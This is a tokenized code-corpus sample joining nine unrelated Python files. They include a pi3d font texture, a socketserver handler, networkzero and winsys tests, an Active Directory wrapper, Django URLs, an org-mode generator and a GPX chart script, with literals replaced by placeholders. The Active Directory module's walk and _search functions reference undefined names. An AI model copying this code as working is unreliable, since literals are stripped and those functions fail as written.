<s> import ctypes <EOL> import numpy as np <EOL> from PIL import ImageDraw <EOL> from pi3d . constants import * <EOL> from pi3d . Texture import Texture <EOL> import sys <EOL> if sys . version_info [ <NUM_LIT:0> ] == <NUM_LIT:3> : <EOL> unichr = chr <EOL> class Pngfont ( Texture ) : <EOL> def __init__ ( self , font , color = ( <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> , <NUM_LIT:255> ) ) : <EOL> """<STR_LIT>""" <EOL> if not font . endswith ( '<STR_LIT>' ) : <EOL> font += '<STR_LIT>' <EOL> super ( Pngfont , self ) . __init__ ( font ) <EOL> pixels = self . im . load ( ) <EOL> self . glyph_table = { } <EOL> for v in range ( <NUM_LIT> ) : <EOL> x = ( pixels [ v * <NUM_LIT:2> , <NUM_LIT:0> ] [ <NUM_LIT:0> ] * <NUM_LIT> ) / self . ix <EOL> y = ( ( pixels [ v * <NUM_LIT:2> , <NUM_LIT:0> ] [ <NUM_LIT:1> ] + <NUM_LIT:8> ) * <NUM_LIT> ) / self . iy <EOL> width = float ( pixels [ v * <NUM_LIT:2> + <NUM_LIT:1> , <NUM_LIT:0> ] [ <NUM_LIT:0> ] ) <EOL> height = float ( pixels [ v * <NUM_LIT:2> + <NUM_LIT:1> , <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> width_scale = width / self . ix <EOL> height_scale = height / self . iy <EOL> self . glyph_table [ unichr ( v + <NUM_LIT:32> ) ] = [ width , height , <EOL> [ ( x + width_scale , y - height_scale ) , <EOL> ( x , y - height_scale ) , <EOL> ( x , y ) , <EOL> ( x + width_scale , y ) ] , <EOL> [ ( width , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , - height , <NUM_LIT:0> ) , ( width , - height , <NUM_LIT:0> ) ] ] <EOL> self . height = height <EOL> alph = self . im . split ( ) [ - <NUM_LIT:1> ] <EOL> draw = ImageDraw . Draw ( self . im ) <EOL> draw . rectangle ( ( <NUM_LIT:0> , <NUM_LIT:1> , self . ix , self . iy ) , fill = color ) <EOL> self . im . putalpha ( alph ) <EOL> RGBs = '<STR_LIT>' <EOL> self . im = self . im . convert ( RGBs ) <EOL> self . image = np . array ( self . im ) <EOL> self . _tex = ctypes . c_int ( ) </s>
<s> import logging <EOL> try : <EOL> import socketserver <EOL> except ImportError : <EOL> import SocketServer as socketserver <EOL> import static <EOL> class ThreadedServer ( socketserver . ThreadingTCPServer ) : <EOL> allow_reuse_address = <NUM_LIT:1> <EOL> def __init__ ( self , server_address , request_handler_class ) : <EOL> tcp_server = socketserver . ThreadingTCPServer . __init__ <EOL> tcp_server ( self , server_address , request_handler_class ) <EOL> self . cmds = [ ] <EOL> self . logger = logging . getLogger ( '<STR_LIT:default>' ) <EOL> def serve ( self ) : <EOL> self . serve_forever ( ) <EOL> def add_callback ( self , cmd , callback ) : <EOL> self . cmds += [ ( cmd , callback ) ] <EOL> class RequestHandler ( socketserver . StreamRequestHandler ) : <EOL> def handle ( self ) : <EOL> banner_params = ( static . fqdn , static . name , static . version ) <EOL> self . wfile . write ( '<STR_LIT>' % banner_params ) <EOL> while <NUM_LIT:1> : <EOL> unknown_cmd = True <EOL> line = self . rfile . readline ( ) . rstrip ( ) <EOL> if not line : <EOL> break <EOL> spaced = line . split ( '<STR_LIT:U+0020>' ) <EOL> cmd = spaced [ <NUM_LIT:0> ] <EOL> if len ( spaced ) > <NUM_LIT:1> : <EOL> args = spaced [ <NUM_LIT:1> : ] <EOL> else : <EOL> args = None <EOL> if cmd == '<STR_LIT>' : <EOL> break <EOL> for item in self . server . cmds : <EOL> if cmd == item [ <NUM_LIT:0> ] : <EOL> unknown_cmd = False <EOL> item [ <NUM_LIT:1> ] ( self , args ) <EOL> break <EOL> if unknown_cmd : <EOL> self . wfile . write ( '<STR_LIT>' + cmd + '<STR_LIT:\n>' ) <EOL> def setup ( self ) : <EOL> socketserver . StreamRequestHandler . setup ( self ) <EOL> host = self . client_address [ <NUM_LIT:0> ] <EOL> port = str ( self . client_address [ <NUM_LIT:1> ] ) <EOL> self . server . logger . info ( host + '<STR_LIT::>' + port + '<STR_LIT>' ) <EOL> def finish ( self ) : <EOL> socketserver . StreamRequestHandler . finish ( self ) <EOL> host = self . client_address [ <NUM_LIT:0> ] <EOL> port = str ( self . client_address [ <NUM_LIT:1> ] ) <EOL> self . server . logger . info ( host + '<STR_LIT::>' + port + '<STR_LIT>' ) </s>
<s> try : <EOL> import queue <EOL> except ImportError : <EOL> import Queue as queue <EOL> import re <EOL> import threading <EOL> import time <EOL> import uuid <EOL> import pytest <EOL> import networkzero as nw0 <EOL> _logger = nw0 . core . get_logger ( "<STR_LIT>" ) <EOL> nw0 . core . _enable_debug_logging ( ) <EOL> is_valid_ip = nw0 . core . is_valid_ip <EOL> is_valid_port = nw0 . core . is_valid_port <EOL> is_valid_address = nw0 . core . is_valid_address <EOL> class SupportThread ( threading . Thread ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , context ) : <EOL> threading . Thread . __init__ ( self ) <EOL> self . context = context <EOL> self . queue = queue . Queue ( ) <EOL> self . setDaemon ( True ) <EOL> def run ( self ) : <EOL> try : <EOL> while True : <EOL> test_name , args = self . queue . get ( ) <EOL> if test_name is None : <EOL> break <EOL> function = getattr ( self , "<STR_LIT>" + test_name ) <EOL> function ( * args ) <EOL> except : <EOL> _logger . exception ( "<STR_LIT>" ) <EOL> def support_test_discover_before_advertise ( self , service ) : <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> nw0 . advertise ( service ) <EOL> @ pytest . fixture <EOL> def support ( request ) : <EOL> thread = SupportThread ( nw0 . sockets . context ) <EOL> def finalise ( ) : <EOL> thread . queue . put ( ( None , None ) ) <EOL> thread . join ( ) <EOL> thread . start ( ) <EOL> return thread <EOL> @ pytest . fixture <EOL> def beacon ( request ) : <EOL> nw0 . discovery . reset_beacon ( ) <EOL> def test_advertise_no_address ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert is_valid_address ( address ) <EOL> assert [ service , address ] in nw0 . discover_all ( ) <EOL> def test_advertise_no_port ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert is_valid_address ( address , port_range = nw0 . config . DYNAMIC_PORTS ) <EOL> assert [ service , address ] in nw0 . discover_all ( ) <EOL> def test_advertise_full_address ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> service_address = "<STR_LIT>" <EOL> address = nw0 . advertise ( service , service_address ) <EOL> assert address == service_address <EOL> assert [ service , address ] in nw0 . discover_all ( ) <EOL> def test_discover ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert address == nw0 . discover ( service ) <EOL> def test_discover_not_exists_with_timeout ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert None is nw0 . discover ( uuid . uuid4 ( ) . hex , wait_for_s = <NUM_LIT:2> ) <EOL> def test_discover_exists_with_timeout ( beacon ) : <EOL> service = uuid . uuid4 ( ) . hex <EOL> address = nw0 . advertise ( service ) <EOL> assert address == nw0 . discover ( service , wait_for_s = <NUM_LIT:2> ) <EOL> def test_discover_all ( beacon ) : <EOL> service1 = uuid . uuid4 ( ) . hex <EOL> address1 = nw0 . advertise ( service1 ) <EOL> service2 = uuid . uuid4 ( ) . hex <EOL> address2 = nw0 . advertise ( service2 ) <EOL> services = dict ( nw0 . discover_all ( ) ) <EOL> assert services == { service1 : address1 , service2 : address2 } <EOL> def test_discover_before_advertise ( beacon , support ) : <EOL> service1 = uuid . uuid4 ( ) . hex <EOL> support . queue . put ( ( "<STR_LIT>" , [ service1 ] ) ) <EOL> address1 = nw0 . discover ( service1 , wait_for_s = <NUM_LIT:5> ) <EOL> assert address1 is not None <EOL> def test_discover_group ( beacon ) : <EOL> group = uuid . uuid4 ( ) . hex <EOL> service1 = "<STR_LIT>" % ( group , uuid . uuid4 ( ) . hex ) <EOL> service2 = "<STR_LIT>" % ( group , uuid . uuid4 ( ) . hex ) <EOL> service3 = "<STR_LIT>" % ( uuid . uuid4 ( ) . hex , uuid . uuid4 ( ) . hex ) <EOL> address1 = nw0 . advertise ( service1 ) <EOL> address2 = nw0 . advertise ( service2 ) <EOL> address3 = nw0 . advertise ( service3 ) <EOL> discovered_group = nw0 . discover_group ( group ) <EOL> assert set ( discovered_group ) == set ( [ ( service1 , address1 ) , ( service2 , address2 ) ] ) </s>
<s> from winsys import event_logs <EOL> try : <EOL> source = event_logs . event_source ( "<STR_LIT>" ) <EOL> except event_logs . x_not_found : <EOL> source = event_logs . EventSource . create ( "<STR_LIT>" ) <EOL> try : <EOL> source . log_event ( type = "<STR_LIT>" , message = "<STR_LIT>" ) <EOL> finally : <EOL> source . delete ( ) </s>
<s> from __future__ import unicode_literals <EOL> import os , sys <EOL> import re <EOL> import pythoncom <EOL> import win32com . client <EOL> from win32com . adsi import adsi , adsicon <EOL> from winsys import constants , core , exc , utils <EOL> """<STR_LIT>""" <EOL> class x_active_directory ( exc . x_winsys ) : <EOL> "<STR_LIT>" <EOL> SEARCHPREF = constants . Constants . from_pattern ( "<STR_LIT>" , namespace = adsicon ) <EOL> SEARCHPREF . doc ( "<STR_LIT>" ) <EOL> SCOPE = constants . Constants . from_pattern ( "<STR_LIT>" , namespace = adsicon ) <EOL> SCOPE . doc ( "<STR_LIT>" ) <EOL> WINERROR_MAP = { <EOL> adsicon . E_ADS_COLUMN_NOT_SET : exc . x_not_found , <EOL> <NUM_LIT> : AttributeError <EOL> } <EOL> wrapped = exc . wrapper ( WINERROR_MAP , x_active_directory ) <EOL> SEARCH_PREFERENCES = { <EOL> SEARCHPREF . PAGESIZE : <NUM_LIT:1000> , <EOL> SEARCHPREF . SEARCH_SCOPE : SCOPE . SUBTREE , <EOL> } <EOL> class Result ( dict ) : <EOL> def __getattr__ ( self , attr ) : <EOL> return self [ attr ] <EOL> ESCAPED_CHARACTERS = dict ( ( special , r"<STR_LIT>" % ord ( special ) ) for special in "<STR_LIT>" ) <EOL> def escaped ( s ) : <EOL> for original , escape in ESCAPED_CHARACTERS . items ( ) : <EOL> s = s . replace ( original , escape ) <EOL> return s <EOL> class IADs ( core . _WinSysObject ) : <EOL> def __init__ ( self , obj , interface = adsi . IID_IADs ) : <EOL> self . _obj = wrapped ( obj . QueryInterface , interface ) <EOL> def __getattr__ ( self , attr ) : <EOL> try : <EOL> return getattr ( self . _obj , attr ) <EOL> except AttributeError : <EOL> return wrapped ( self . _obj . Get , attr ) <EOL> def __getitem__ ( self , item ) : <EOL> return self . __class__ . from_object ( <EOL> self . _obj . QueryInterface ( <EOL> adsi . IID_IADsContainer <EOL> ) . GetObject ( <EOL> None , <EOL> item <EOL> ) <EOL> ) <EOL> def pyobject ( self ) : <EOL> return self . _obj <EOL> def as_string ( self ) : <EOL> return self . _obj . ADsPath <EOL> @ classmethod <EOL> def from_string ( cls , moniker , username = None , password = None , interface = adsi . IID_IADs ) : <EOL> return cls . from_object ( <EOL> adsi . ADsOpenObject ( <EOL> moniker , <EOL> username , password , <EOL> adsicon . ADS_SECURE_AUTHENTICATION | adsicon . ADS_SERVER_BIND | adsicon . ADS_FAST_BIND , <EOL> interface <EOL> ) <EOL> ) <EOL> @ classmethod <EOL> def from_object ( cls , obj ) : <EOL> klass = CLASS_MAP . get ( obj . QueryInterface ( adsi . IID_IADs ) . Class . lower ( ) , cls ) <EOL> return klass ( obj ) <EOL> def __iter__ ( self ) : <EOL> try : <EOL> enumerator = adsi . ADsBuildEnumerator ( <EOL> self . _obj . QueryInterface ( <EOL> adsi . IID_IADsContainer <EOL> ) <EOL> ) <EOL> except : <EOL> raise TypeError ( "<STR_LIT>" % self ) <EOL> while True : <EOL> item = adsi . ADsEnumerateNext ( enumerator , <NUM_LIT:1> ) <EOL> if item : <EOL> yield IADs . from_object ( item [ <NUM_LIT:0> ] ) <EOL> else : <EOL> break <EOL> def walk ( self , depthfirst = False ) : <EOL> """<STR_LIT>""" <EOL> top = self <EOL> containers , items = [ ] , [ ] <EOL> for item in self : <EOL> if isinstance ( f , Dir ) : <EOL> dirs . append ( f ) <EOL> else : <EOL> nondirs . append ( f ) <EOL> if not depthfirst : yield top , dirs , nondirs <EOL> for d in dirs : <EOL> for x in d . walk ( depthfirst = depthfirst , ignore_access_errors = ignore_access_errors ) : <EOL> yield x <EOL> if depthfirst : yield top , dirs , nondirs <EOL> class IADsOU ( IADs ) : <EOL> def __init__ ( self , obj ) : <EOL> IADs . __init__ ( self , obj ) <EOL> class IADsUser ( IADs ) : <EOL> def __init__ ( self , obj ) : <EOL> IADs . __init__ ( self , obj ) <EOL> class IADsGroup ( IADs ) : <EOL> def __init__ ( self , obj ) : <EOL> IADs . __init__ ( self , obj ) <EOL> class GC ( IADs ) : <EOL> def __iter__ ( self ) : <EOL> for domain in IADs . __iter__ ( self ) : <EOL> yield ad ( "<STR_LIT>" + domain . Name ) <EOL> def ad ( obj = core . UNSET , username = None , password = None , interface = adsi . IID_IADs ) : <EOL> if obj is core . UNSET : <EOL> return IADs . from_string ( ldap_moniker ( username = username , password = password ) , username , password ) <EOL> elif obj is None : <EOL> return None <EOL> elif isinstance ( obj , IADs ) : <EOL> return obj <EOL> elif isinstance ( obj , basestring ) : <EOL> moniker = obj <EOL> if not moniker . upper ( ) . startswith ( "<STR_LIT>" ) : <EOL> moniker = "<STR_LIT>" + moniker <EOL> return IADs . from_string ( moniker , username , password , interface ) <EOL> else : <EOL> return IADs . from_object ( obj ) <EOL> def ldap_moniker ( root = None , server = None , username = None , password = None ) : <EOL> if root is None : <EOL> root = adsi . ADsOpenObject ( <EOL> ldap_moniker ( "<STR_LIT>" , server ) , <EOL> username , password , <EOL> adsicon . ADS_SECURE_AUTHENTICATION | adsicon . ADS_SERVER_BIND | adsicon . ADS_FAST_BIND , <EOL> adsi . IID_IADs <EOL> ) . Get ( "<STR_LIT>" ) <EOL> prefix , rest = re . match ( "<STR_LIT>" , root ) . groups ( ) <EOL> if not prefix : <EOL> prefix = "<STR_LIT>" <EOL> if server : <EOL> return "<STR_LIT>" % ( prefix , server , root ) <EOL> else : <EOL> return "<STR_LIT>" % ( prefix , root ) <EOL> def _search ( filter , root = None , server = None , username = None , password = None ) : <EOL> def get_column_value ( hSearch , column ) : <EOL> CONVERT_TO_LIST = set ( [ '<STR_LIT>' , "<STR_LIT>" ] ) <EOL> try : <EOL> column_name , column_type , column_values = directory_search . GetColumn ( hSearch , column ) <EOL> if column_name in CONVERT_TO_LIST : <EOL> return list ( value for value , type in column_values ) <EOL> else : <EOL> for value , type in column_values : <EOL> return value <EOL> except adsi . error : <EOL> details = sys . exc_info ( ) [ <NUM_LIT:1> ] <EOL> if details [ <NUM_LIT:0> ] == adsicon . E_ADS_COLUMN_NOT_SET : <EOL> return None <EOL> else : <EOL> raise <EOL> pythoncom . CoInitialize ( ) <EOL> try : <EOL> directory_search = adsi . ADsOpenObject ( <EOL> ldap_moniker ( root , server , username , password ) , <EOL> username , password , <EOL> adsicon . ADS_SECURE_AUTHENTICATION | adsicon . ADS_SERVER_BIND | adsicon . ADS_FAST_BIND , <EOL> adsi . IID_IDirectorySearch <EOL> ) <EOL> directory_search . SetSearchPreference ( [ ( k , ( v , ) ) for k , v in SEARCH_PREFERENCES . items ( ) ] ) <EOL> hSearch = directory_search . ExecuteSearch ( filter , columns ) <EOL> try : <EOL> hResult = directory_search . GetFirstRow ( hSearch ) <EOL> while hResult == <NUM_LIT:0> : <EOL> yield Result ( ( column , get_column_value ( hSearch , column ) ) for column in columns ) <EOL> hResult = directory_search . GetNextRow ( hSearch ) <EOL> finally : <EOL> directory_search . AbandonSearch ( hSearch ) <EOL> directory_search . CloseSearchHandle ( hSearch ) <EOL> finally : <EOL> pythoncom . CoUninitialize ( ) <EOL> def _and ( * args ) : <EOL> return "<STR_LIT>" % "<STR_LIT>" . join ( "<STR_LIT>" % s for s in args ) <EOL> def _or ( * args ) : <EOL> return "<STR_LIT>" % "<STR_LIT>" . join ( "<STR_LIT>" % s for s in args ) <EOL> def find_user ( name , root_path = None , server = None , username = None , password = None , columns = [ "<STR_LIT:*>" ] ) : <EOL> name = escaped ( name ) <EOL> for user in search ( <EOL> _and ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> _or ( <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name <EOL> ) <EOL> ) , <EOL> [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:title>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> root_path , <EOL> server , <EOL> username , <EOL> password <EOL> ) : <EOL> return user <EOL> def find_group ( name , root_path = None , server = None , username = None , password = None , columns = [ "<STR_LIT:*>" ] ) : <EOL> name = escaped ( name ) <EOL> for group in search ( <EOL> filter = _and ( <EOL> "<STR_LIT>" , <EOL> _or ( <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name , <EOL> "<STR_LIT>" + name <EOL> ) <EOL> ) , <EOL> columns = columns , <EOL> root = root_path , server = server , username = username , password = password <EOL> ) : <EOL> return group <EOL> def find_active_users ( root = None , server = None , username = None , password = None , columns = [ "<STR_LIT:*>" ] ) : <EOL> return search ( <EOL> filter = _and ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> columns = columns , <EOL> root = None , server = None , username = None , password = None <EOL> ) <EOL> def find_all_users ( root = None , server = None , username = None , password = None ) : <EOL> for user in search ( <EOL> filter = _and ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) , <EOL> columns = [ "<STR_LIT>" ] , <EOL> root = None , server = None , username = None , password = None <EOL> ) : <EOL> yield ad ( user . distinguishedName ) <EOL> def find_all_namespaces ( ) : <EOL> for i in win32com . client . GetObject ( "<STR_LIT>" ) : <EOL> yield i . ADsPath <EOL> def gc ( ) : <EOL> return ad ( "<STR_LIT>" ) <EOL> CLASS_MAP = { <EOL> "<STR_LIT>" : IADsOU , <EOL> "<STR_LIT:user>" : IADsUser , <EOL> "<STR_LIT>" : IADsGroup , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> import os , sys <EOL> from winsys . _compat import unittest <EOL> from winsys . _compat import * <EOL> from winsys . tests import utils as testutils <EOL> from winsys import constants <EOL> class A ( object ) : <EOL> zero = <NUM_LIT:0> <EOL> x = <NUM_LIT:1> <EOL> y = <NUM_LIT:2> <EOL> z = <NUM_LIT:4> <EOL> f_a = <NUM_LIT:8> <EOL> f_b = <NUM_LIT:16> <EOL> f_c = <NUM_LIT:32> <EOL> class TestBasic ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def test_from_pattern_no_pattern ( self ) : <EOL> self . assertEqual ( constants . from_pattern ( None , "<STR_LIT:abc>" ) , "<STR_LIT:abc>" ) <EOL> def test_from_pattern ( self ) : <EOL> self . assertEqual ( constants . from_pattern ( "<STR_LIT>" , "<STR_LIT>" ) , "<STR_LIT:abc>" ) <EOL> def test_constants_from_list ( self ) : <EOL> c = constants . Constants . from_list ( [ '<STR_LIT:x>' , '<STR_LIT:y>' , '<STR_LIT:z>' ] , namespace = A ) <EOL> self . assertEqual ( c . x , A . x ) <EOL> self . assertEqual ( c [ '<STR_LIT:x>' ] , A . x ) <EOL> def test_constants_from_pattern ( self ) : <EOL> c = constants . Constants . from_pattern ( "<STR_LIT>" , namespace = A ) <EOL> self . assertEqual ( c . a , A . f_a ) <EOL> self . assertEqual ( c [ '<STR_LIT:b>' ] , A . f_b ) <EOL> self . assertEqual ( c . c , A . f_c ) <EOL> def test_constants_from_pattern_with_exclusion ( self ) : <EOL> c = constants . Constants . from_pattern ( "<STR_LIT>" , excluded = [ "<STR_LIT>" ] , namespace = A ) <EOL> self . assertEqual ( c . a , A . f_a ) <EOL> self . assertEqual ( c [ '<STR_LIT:c>' ] , A . f_c ) <EOL> self . assertRaises ( AttributeError , getattr , c , "<STR_LIT:b>" ) <EOL> def test_name_from_value ( self ) : <EOL> c = constants . Constants . from_pattern ( namespace = A ) <EOL> self . assertEqual ( c . name_from_value ( <NUM_LIT:0> ) , "<STR_LIT>" ) <EOL> self . assertEqual ( c . name_from_value ( <NUM_LIT:32> ) , "<STR_LIT>" ) <EOL> def test_names_from_value_nonzero ( self ) : <EOL> c = constants . Constants . from_pattern ( namespace = A ) <EOL> self . assertEqual ( c . names_from_value ( <NUM_LIT:4> ) , [ "<STR_LIT:z>" ] ) <EOL> def test_names_from_value_zero ( self ) : <EOL> c = constants . Constants . from_pattern ( namespace = A ) <EOL> self . assertEqual ( c . names_from_value ( <NUM_LIT:0> ) , [ "<STR_LIT>" ] ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> unittest . main ( ) <EOL> if sys . stdout . isatty ( ) : raw_input ( "<STR_LIT>" ) </s>
<s> try : <EOL> from django . conf . urls import patterns , url <EOL> except ImportError : <EOL> from django . conf . urls . defaults import patterns , url <EOL> from subdomains . tests . urls . default import urlpatterns as default_patterns <EOL> from subdomains . tests . views import view <EOL> urlpatterns = default_patterns + patterns ( '<STR_LIT>' , <EOL> url ( regex = r'<STR_LIT>' , view = view , name = '<STR_LIT>' ) , <EOL> url ( regex = r'<STR_LIT>' , view = view , name = '<STR_LIT>' ) , <EOL> ) </s>
<s> import random <EOL> import datetime <EOL> from . utils . date import timedeltastr , total_seconds <EOL> class RandomDatetime ( object ) : <EOL> def __init__ ( self , pre_days = <NUM_LIT:30> , post_days = <NUM_LIT:30> , hour_min = <NUM_LIT:6> , hour_max = <NUM_LIT> ) : <EOL> self . pre_days = pre_days <EOL> self . post_days = post_days <EOL> self . hour_min = hour_min <EOL> self . hour_max = hour_max <EOL> self . now = datetime . datetime . now ( ) <EOL> self . zero = datetime . datetime ( * self . now . timetuple ( ) [ : <NUM_LIT:3> ] ) <EOL> def datetime ( self , pre = None , post = None ) : <EOL> pre = self . pre_days if pre is None else pre <EOL> post = self . post_days if post is None else post <EOL> delta = datetime . timedelta ( <EOL> random . randrange ( - pre , post + <NUM_LIT:1> ) , <EOL> random . randrange ( self . hour_min , self . hour_max ) * <NUM_LIT> * <NUM_LIT> ) <EOL> return self . zero + delta <EOL> def date ( self , ** kwds ) : <EOL> return datetime . date ( * self . datetime ( ** kwds ) . timetuple ( ) [ : <NUM_LIT:3> ] ) <EOL> def datetimerange ( self , ** kwds ) : <EOL> return self . _start_end ( self . datetime ( ** kwds ) , self . datetime ( ** kwds ) ) <EOL> def daterange ( self , ** kwds ) : <EOL> return self . _start_end ( self . datetime ( ** kwds ) , self . datetime ( ** kwds ) ) <EOL> @ staticmethod <EOL> def _start_end ( d1 , d2 ) : <EOL> if total_seconds ( d1 - d2 ) < <NUM_LIT:0> : <EOL> return ( d1 , d2 ) <EOL> else : <EOL> return ( d2 , d1 ) <EOL> def node ( level , heading , todo = None , scheduled = None , deadline = None , <EOL> closed = None , clock = [ ] , tags = [ ] , datelist = [ ] , rangelist = [ ] ) : <EOL> active_datestr = lambda x : x . strftime ( '<STR_LIT>' ) <EOL> inactive_datestr = lambda x : x . strftime ( '<STR_LIT>' ) <EOL> yield '<STR_LIT:*>' * level <EOL> yield '<STR_LIT:U+0020>' <EOL> if todo : <EOL> yield todo <EOL> yield '<STR_LIT:U+0020>' <EOL> yield heading <EOL> if tags : <EOL> yield '<STR_LIT>' . format ( '<STR_LIT::>' . join ( tags ) ) <EOL> yield '<STR_LIT:\n>' <EOL> if scheduled or deadline or closed : <EOL> yield '<STR_LIT:U+0020>' * level <EOL> for ( name , date , datestr ) in [ ( '<STR_LIT>' , closed , inactive_datestr ) , <EOL> ( '<STR_LIT>' , deadline , active_datestr ) , <EOL> ( '<STR_LIT>' , scheduled , active_datestr ) ] : <EOL> if date : <EOL> yield '<STR_LIT:U+0020>' <EOL> yield name <EOL> yield '<STR_LIT>' <EOL> yield datestr ( date ) <EOL> if scheduled or deadline or closed : <EOL> yield '<STR_LIT:\n>' <EOL> for ( clock_start , clock_end ) in clock : <EOL> yield '<STR_LIT:U+0020>' * ( level + <NUM_LIT:1> ) <EOL> yield '<STR_LIT>' <EOL> yield inactive_datestr ( clock_start ) <EOL> yield '<STR_LIT>' <EOL> yield inactive_datestr ( clock_end ) <EOL> yield '<STR_LIT>' <EOL> yield timedeltastr ( clock_end - clock_start ) <EOL> yield '<STR_LIT:\n>' <EOL> for date in datelist : <EOL> yield inactive_datestr ( date ) <EOL> yield '<STR_LIT:\n>' <EOL> for ( start , end ) in rangelist : <EOL> yield inactive_datestr ( start ) <EOL> yield '<STR_LIT>' <EOL> yield inactive_datestr ( end ) <EOL> yield '<STR_LIT:\n>' <EOL> def makeorg ( num , ** kwds ) : <EOL> heading_pops = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> tags_pops = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:action>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> true_or_false = [ True , False ] <EOL> rd = RandomDatetime ( ** kwds ) <EOL> for i in range ( num ) : <EOL> kwds = { } <EOL> if i == <NUM_LIT:0> : <EOL> kwds [ '<STR_LIT>' ] = <NUM_LIT:1> <EOL> else : <EOL> kwds [ '<STR_LIT>' ] = random . randrange ( <NUM_LIT:1> , <NUM_LIT:4> ) <EOL> kwds [ '<STR_LIT>' ] = random . choice ( heading_pops ) <EOL> if random . choice ( true_or_false ) : <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> else : <EOL> kwds [ '<STR_LIT>' ] = rd . datetime ( post = <NUM_LIT:0> ) <EOL> kwds [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> for sdc in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ sdc ] = rd . date ( ) <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = clock = [ ] <EOL> for _ in range ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:5> ) ) : <EOL> start = rd . datetime ( post = <NUM_LIT:0> ) <EOL> end = start + datetime . timedelta ( <EOL> <NUM_LIT:0> , random . randrange ( <NUM_LIT:30> , <NUM_LIT> ) * <NUM_LIT> ) <EOL> clock . append ( ( start , end ) ) <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = [ random . choice ( tags_pops ) ] <EOL> if random . choice ( true_or_false ) : <EOL> if random . choice ( true_or_false ) : <EOL> kwds [ '<STR_LIT>' ] = [ <EOL> rd . datetime ( ) <EOL> for _ in range ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:5> ) ) ] <EOL> else : <EOL> kwds [ '<STR_LIT>' ] = [ <EOL> rd . datetimerange ( ) <EOL> for _ in range ( random . randrange ( <NUM_LIT:1> , <NUM_LIT:5> ) ) ] <EOL> for s in node ( ** kwds ) : <EOL> yield s <EOL> def writeorg ( file , * args , ** kwds ) : <EOL> file . writelines ( makeorg ( * args , ** kwds ) ) <EOL> def run ( num ) : <EOL> import sys <EOL> writeorg ( sys . stdout , num ) </s>
<s> import gpxpy as mod_gpxpy <EOL> import cartesius . main as mod_cartesius <EOL> import cartesius . charts as mod_charts <EOL> import cartesius . elements as mod_elements <EOL> import logging as mod_logging <EOL> import srtm as mod_srtm <EOL> mod_logging . basicConfig ( level = mod_logging . DEBUG , <EOL> format = '<STR_LIT>' ) <EOL> def get_line ( gpx , color , transparency_mask = None ) : <EOL> def f ( ) : <EOL> previous_point = None <EOL> length = <NUM_LIT:0> <EOL> for point in gpx . walk ( only_points = True ) : <EOL> if previous_point : <EOL> length += previous_point . distance_2d ( point ) <EOL> previous_point = point <EOL> yield mod_charts . data ( length , point . elevation ) <EOL> return mod_charts . LineChart ( data = f , color = color , transparency_mask = transparency_mask ) <EOL> def sample_gpx ( ) : <EOL> return mod_gpxpy . parse ( open ( '<STR_LIT>' ) ) <EOL> coordinate_system = mod_cartesius . CoordinateSystem ( bounds = ( - <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> , <NUM_LIT> ) ) <EOL> coordinate_system . add ( mod_elements . Grid ( <NUM_LIT:20> , <NUM_LIT:100> ) ) <EOL> gpx = sample_gpx ( ) <EOL> coordinate_system . add ( get_line ( gpx , color = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> data = mod_srtm . get_data ( ) <EOL> gpx = sample_gpx ( ) <EOL> data . add_elevations ( gpx ) <EOL> coordinate_system . add ( get_line ( gpx , color = ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:255> ) , transparency_mask = <NUM_LIT> ) ) <EOL> gpx = sample_gpx ( ) <EOL> data . add_elevations ( gpx , smooth = True ) <EOL> coordinate_system . add ( get_line ( gpx , color = ( <NUM_LIT:255> , <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> coordinate_system . add ( mod_elements . Axis ( horizontal = True , labels = <NUM_LIT> , points = <NUM_LIT:100> ) ) <EOL> coordinate_system . add ( mod_elements . Axis ( vertical = True , labels = <NUM_LIT:100> , points = <NUM_LIT:20> ) ) <EOL> image = coordinate_system . draw ( <NUM_LIT> , <NUM_LIT> , antialiasing = True ) <EOL> image . save ( '<STR_LIT>' ) </s>
